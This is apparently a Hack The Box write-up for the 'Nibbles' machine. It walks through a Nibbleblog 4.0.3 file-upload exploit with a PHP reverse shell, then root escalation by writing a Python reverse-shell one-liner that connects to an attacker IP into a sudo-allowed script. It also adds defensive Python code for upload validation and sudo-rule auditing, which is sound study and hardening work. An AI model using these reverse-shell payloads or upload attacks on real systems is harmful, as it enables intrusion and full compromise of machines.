HTB: Nibbles
After Bashed is Traceback but I’ve done that before; next is Nibbles.
Ports
SSH and HTTP only.
HTTP
The frontpage just says Hello world! but in the page source there is a comment about /nibbleblog, so we go there. It’s running a CMS called nibbleblog; searchsploit says there are two exploits: SQLi in version 3 and an arbitrary file upload in version 4.0.3. It’s not immediately clear which we have.
Some enumeration reveals http://10.10.10.75/nibbleblog/README:
====== Nibbleblog ======
Version: v4.0.3
Codename: Coffee
Release date: 2014-04-01
So we’re after the arbitrary file upload; but it needs authentication. I try bruteforcing the login, but it has a protection mechanism whereby you are locked out after only a few attempts. I google for how to defeat it, but all of the results are Nibbles writeups!
This blog talks about how to get around the bruteforce prevention without spoiling the rest of the box, but it also gives up the password. I feel a bit conflicted about this, but I use it and log in.
I also fork the repo with the script (Python) for future reference.
Yeeting Metasploit?
The exploit from Searchsploit is a Metasploit module. Nah, let’s see if we can do it manually. It looks fairly straightforward. We use the GUI to upload a file (the Pentestmonkey PHP reverse shell) at http://10.10.10.75/nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image
This prints a bunch of warnings, e.g.
Warning: imagesx() expects parameter 1 to be resource, boolean given in /var/www/html/nibbleblog/admin/kernel/helpers/resize.class.php on line 26
But even so it does work. We visit the shell (it gets renamed to image.php) at http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php and we get our shell.
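The upload worked because the plugin stored whatever it was given under a .php name, so the web server handed the "image" to the PHP interpreter. As an added example (my own code, not Nibbleblog's, and not a fix for the real plugin), here is the weak pattern next to a hardened check: the server sniffs the file's magic bytes, refuses anything that is not a supported image or that carries a PHP open tag, and chooses the stored name and extension itself rather than taking them from the request. The function and parameter names, the size limit and the sample byte strings are all constructed for the demo.

```python
"""Image upload validation: client-trusting check beside a content-based one.

Added example, not code from Nibbleblog or from the writeup.
"""
import re

# Magic-byte prefixes of the formats an image plugin has any business accepting,
# mapped to the extension the server will use when it stores the file.
IMAGE_SIGNATURES = {
    b"\x89PNG\r\n\x1a\n": ".png",
    b"\xff\xd8\xff": ".jpg",
    b"GIF87a": ".gif",
    b"GIF89a": ".gif",
}

# Full `<?php` tag or the short echo tag. A bare `<?` is deliberately not
# matched: two such bytes can legitimately occur inside compressed image data.
SCRIPT_MARKER = re.compile(rb"<\?php\b|<\?=", re.IGNORECASE)


def weak_accept(filename: str, declared_type: str) -> bool:
    """The pattern to avoid: trusts the client's filename and Content-Type.

    A request can claim image/png for any payload, so this accepts shell.php.
    """
    return declared_type.startswith("image/") or filename.lower().endswith(
        (".png", ".jpg", ".gif")
    )


def sniff_image_extension(data: bytes):
    """Return the server-chosen extension for recognised image content, else None."""
    for signature, ext in IMAGE_SIGNATURES.items():
        if data.startswith(signature):
            return ext
    return None


def validate_upload(filename: str, data: bytes, stored_stem: str = "image",
                    max_bytes: int = 2_000_000):
    """Return (accepted, stored_name_or_reason).

    `filename` is only used for logging by a caller; nothing about the stored
    name is derived from it. `stored_stem` stands in for whatever naming scheme
    the application uses (constructed parameter).
    """
    if len(data) > max_bytes:
        return False, "too large"
    ext = sniff_image_extension(data)
    if ext is None:
        return False, "content is not a supported image"
    # Polyglot guard: a valid image header followed by PHP is still rejected,
    # because a misconfigured handler may execute it regardless of extension.
    if SCRIPT_MARKER.search(data):
        return False, "image carries embedded script"
    return True, stored_stem + ext


if __name__ == "__main__":
    # Constructed samples: a PHP file claiming to be an image, and a real PNG header.
    print(weak_accept("shell.php", "image/png"))                      # True: the weak check passes it
    print(validate_upload("shell.php", b"<?php echo 'hi'; ?>"))       # rejected by content
    print(validate_upload("cat.png", b"\x89PNG\r\n\x1a\n" + bytes(32)))  # (True, 'image.png')
```

The second half of the fix lives outside the code: the directory the plugin writes to should be served as static content with script execution disabled, so that even a bypass of the content check yields a download rather than code execution.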
Privesc
We are nibbler. My shell is a bit dodgy and sudo -l won’t work. However, it works via linpeas for some reason, and we can run /home/nibbler/personal/stuff/monitor.sh as root. Okey dokey. This file doesn’t actually exist, but there is a zip file called personal which we can unzip and it creates the path and file. We own monitor.sh so we can make it whatever we want. I try a few payloads before I get one that works:
nibbler@Nibbles:/home/nibbler/personal/stuff$ rm monitor.sh
rm monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ printf '#!/usr/bin/python3\n' >> monitor.sh
<er/personal/stuff$ printf '#!/usr/bin/python3\n' >> monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ printf 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.9",1235));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\n' >> monitor.sh
< os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\n' >> monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ chmod +x monitor.sh
chmod +x monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ !33
!33
sudo -u root /home/nibbler/personal/stuff/monitor.sh
sudo: unable to resolve host Nibbles: Connection timed out
In my listener:
┌──(root💀kali)-[/opt/htb/nibbles]
└─# nc -nvlp 1235 1 ⨯
listening on [any] 1235 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.75] 38506
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls -lash
total 32K
4.0K drwx------ 4 root root 4.0K Dec 15 05:09 .
4.0K drwxr-xr-x 23 root root 4.0K Dec 15 05:13 ..
0 -rw------- 1 root root 0 Dec 29 2017 .bash_history
4.0K -rw-r--r-- 1 root root 3.1K Oct 22 2015 .bashrc
4.0K drwx------ 2 root root 4.0K Dec 10 2017 .cache
4.0K drwxr-xr-x 2 root root 4.0K Dec 10 2017 .nano
4.0K -rw-r--r-- 1 root root 148 Aug 17 2015 .profile
4.0K -rw------- 1 root root 1.1K Dec 15 05:09 .viminfo
4.0K -r-------- 1 root root 33 Mar 7 03:44 root.txt
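The root cause here is a sudo rule whose target sits under a directory the rule's own user controls, and which does not even exist yet. As an added example (my own audit script, not a tool from the box or the writeup), the code below parses one-line sudoers rules, and for each command path walks from the target up to the root of the tree, flagging a missing target and every component the user could write. The sample sudoers text is constructed to mirror the Nibbles finding; the `prefix` parameter and the `run_demo()` helper are mine, and because an unprivileged process cannot create root-owned files, the demo uses read-only (0o555) directories to stand in for system paths while the user's home stays 0o700.

```python
"""Audit sudo rules for targets the rule's user can create or replace.

Added example, not from the Nibbles box or any real tool.
"""
import os
import re
import shutil
import stat
import tempfile

# Constructed sample modelled on the Nibbles finding; not the box's real file.
SAMPLE_SUDOERS = """\
Defaults env_reset
root    ALL=(ALL:ALL) ALL
nibbler ALL=(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
nibbler ALL=(root) NOPASSWD: /usr/local/bin/monitor.sh
"""

# One-line user rule:  user  host=(runas) [TAG:] cmd[, cmd ...]
RULE_RE = re.compile(r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*\((?P<runas>[^)]*)\)\s*(?P<rest>.+)$")


def parse_sudoers(text):
    """Return a dict per user rule with user, runas, tags and command paths."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        # Skip blanks, Defaults, group rules and alias definitions (not needed here).
        if not line or line.startswith(("Defaults", "%")) or "_Alias" in line.split()[0]:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        rest = m.group("rest")
        tags = re.findall(r"\b([A-Z_]+):", rest)
        commands = re.sub(r"\b[A-Z_]+:\s*", "", rest)
        paths = [c.strip().split()[0] for c in commands.split(",") if c.strip()]
        rules.append({"user": m.group("user"), "runas": m.group("runas"),
                      "tags": tags, "paths": paths})
    return rules


def _writable_by(st, uid, gids):
    """Mode-bit check only: owner/group/other write bits against the given ids."""
    mode = st.st_mode
    if st.st_uid == uid and mode & stat.S_IWUSR:
        return True
    if st.st_gid in gids and mode & stat.S_IWGRP:
        return True
    return bool(mode & stat.S_IWOTH)


def audit_path(path, uid, gids, prefix="/"):
    """List the ways `uid` could control what runs at `path`.

    `prefix` re-roots the walk into a test tree (constructed parameter).
    """
    top = os.path.abspath(prefix)
    full = os.path.join(top, path.lstrip("/"))
    findings = []
    if not os.path.lexists(full):
        findings.append(f"target {path} does not exist; whoever can write its "
                        "first existing ancestor gets to create it")
    cur, child_st = full, None
    while True:
        try:
            st = os.lstat(cur)
        except FileNotFoundError:
            st = None
        if st is not None:
            if _writable_by(st, uid, gids):
                # A sticky world-writable directory (like /tmp) only lets the
                # owner of an existing entry rename or remove it.
                sticky_protects = (stat.S_ISDIR(st.st_mode) and st.st_mode & stat.S_ISVTX
                                   and child_st is not None and child_st.st_uid != uid)
                if not sticky_protects:
                    kind = "target" if cur == full else "ancestor"
                    findings.append(f"{kind} {cur} is writable by uid {uid}")
            child_st = st
        if cur == top:
            break
        cur = os.path.dirname(cur)
    return findings


def audit_rules(text, uid, gids, prefix="/"):
    """Map (user, command path) to findings for every absolute command path."""
    return {(r["user"], p): audit_path(p, uid, gids, prefix)
            for r in parse_sudoers(text) for p in r["paths"] if p.startswith("/")}


def run_demo():
    """Build a throwaway tree for the sample rules and audit it as the current user."""
    top = tempfile.mkdtemp()
    home = os.path.join(top, "home", "nibbler")
    bindir = os.path.join(top, "usr", "local", "bin")
    os.makedirs(home)
    os.makedirs(bindir)
    good = os.path.join(bindir, "monitor.sh")
    with open(good, "w") as fh:
        fh.write("#!/bin/sh\nexit 0\n")
    # Read-only modes stand in for root ownership; the home dir stays user-writable.
    os.chmod(home, 0o700)
    for d in (top, os.path.join(top, "home"), os.path.join(top, "usr"),
              os.path.join(top, "usr", "local"), bindir):
        os.chmod(d, 0o555)
    os.chmod(good, 0o555)
    try:
        return audit_rules(SAMPLE_SUDOERS, os.getuid(), {os.getgid()}, prefix=top)
    finally:
        for root, _dirs, _files in os.walk(top):   # restore write bits so cleanup works
            os.chmod(root, 0o700)
        shutil.rmtree(top)


if __name__ == "__main__":
    for key, findings in run_demo().items():
        print(key, findings or ["ok"])
```

Against the sample, the /home/nibbler rule is flagged twice (the target is missing, and /home/nibbler is writable by the user), while the /usr/local/bin rule comes back clean. On a real host the same walk, run without a prefix, is the check to add to a hardening review: a sudo target is only as trustworthy as the least-protected component of its path.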
So that was that, but I can’t help feeling I missed the most important part of this challenge. Anyway; next cab off the rank is Optimum. I’ll have a crack at that tomorrow.